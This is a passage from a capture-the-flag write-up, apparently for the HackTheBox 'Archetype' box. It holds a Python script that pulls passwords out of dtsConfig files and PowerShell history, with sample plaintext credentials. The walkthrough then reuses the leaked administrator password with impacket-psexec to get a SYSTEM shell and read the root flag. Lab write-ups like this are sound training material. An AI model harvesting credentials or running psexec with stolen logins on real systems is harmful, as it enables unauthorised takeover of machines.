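NET_USE_RE = re.compile(r"^\s*net(?:\.exe)?\s+use\b", re.IGNORECASE)


def redact(secret):
    """Keep first/last character so a finding is recognisable but not reusable."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]


def parse_connection_string(conn):
    """Split 'Key=Value;Key=Value;' into a dict with lower-cased keys."""
    pairs = {}
    for part in conn.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = value.strip()
    return pairs


def audit_dtsconfig(xml_text, name="prod.dtsConfig"):
    """Return findings for every ConnectionString property in a dtsConfig file."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        if "ConnectionString" not in conf.get("Path", ""):
            continue
        pairs = parse_connection_string(conf.findtext("ConfiguredValue") or "")
        user = pairs.get("user id", "<unknown>")
        for key in sorted(SECRET_KEYS & pairs.keys()):
            findings.append({"file": name, "kind": "connection-string password",
                             "user": user, "secret": redact(pairs[key])})
        if pairs.get("persist security info", "").lower() == "true":
            # the provider keeps the password inside the connection object after connecting
            findings.append({"file": name, "kind": "Persist Security Info=True",
                             "user": user, "secret": ""})
    return findings


def audit_net_use(line):
    """Return (user, password) if a 'net use' line embeds a password, else None."""
    if not NET_USE_RE.match(line):
        return None
    user, candidates = None, []
    for tok in line.split()[2:]:                       # skip 'net use'
        low = tok.lower()
        if low.startswith("/user:"):
            user = tok[len("/user:"):]
        elif tok.startswith("/") or tok.startswith("\\\\") or re.fullmatch(r"[a-z]:", low):
            continue                                   # switch, UNC path or drive letter
        else:
            candidates.append(tok)                     # net use takes the password as a bare token
    if user is None or not candidates or candidates[0] == "*":
        return None                                    # '*' makes net prompt instead
    return user, candidates[0]


def audit_history(text, name="ConsoleHost_history.txt"):
    """Scan shell history lines for 'net use' commands with embedded passwords."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hit = audit_net_use(line)
        if hit:
            findings.append({"file": f"{name}:{lineno}", "kind": "net use password",
                             "user": hit[0], "secret": redact(hit[1])})
    return findings


# Constructed samples mirroring the files found on the box.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
"""
SAMPLE_HISTORY = r"""net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
net use S: \\fileserver\share * /user:backupsvc
"""

if __name__ == "__main__":
    for f in audit_dtsconfig(SAMPLE_DTSCONFIG) + audit_history(SAMPLE_HISTORY):
        print(f"{f['file']}: {f['kind']} user={f['user']} secret={f['secret']}")
```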
ConsoleHost_history.txt
SUBMIT FLAG
Question: Submit user flag
In TASK5 we used two different approaches to grab the user flag.
flag
SUBMIT FLAG
Question: Submit root flag
We can use the admin credentials found in TASK7 to get an admin shell on the target.
| admin credentials | |
|---|---|
| username | administrator |
| password | MEGACORP_4dm1n!! |
Using psexec from impacket will land us system privileges.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Requesting shares on 10.129.63.163.....
[*] Found writable share ADMIN$
[*] Uploading file ZUxKInhO.exe
[*] Opening SVCManager on 10.129.63.163.....
[*] Creating service EEnc on 10.129.63.163.....
[*] Starting service EEnc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows>
These high-level privileges give us access to the administrator’s desktop - C:\Users\Administrator\Desktop - which is where our root flag resides.
C:\Windows>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator\Desktop
07/27/2021 02:30 AM <DIR> .
07/27/2021 02:30 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,689,736,704 bytes free
C:\Users\Administrator\Desktop>
All that is left now is to grab the root flag and terminate the connection.
C:\Users\Administrator\Desktop>type root.txt
<flag>
C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.129.63.163.....
[*] Stopping service EEnc.....
[*] Removing service EEnc.....
[*] Removing file ZUxKInhO.exe.....
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
flag
Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!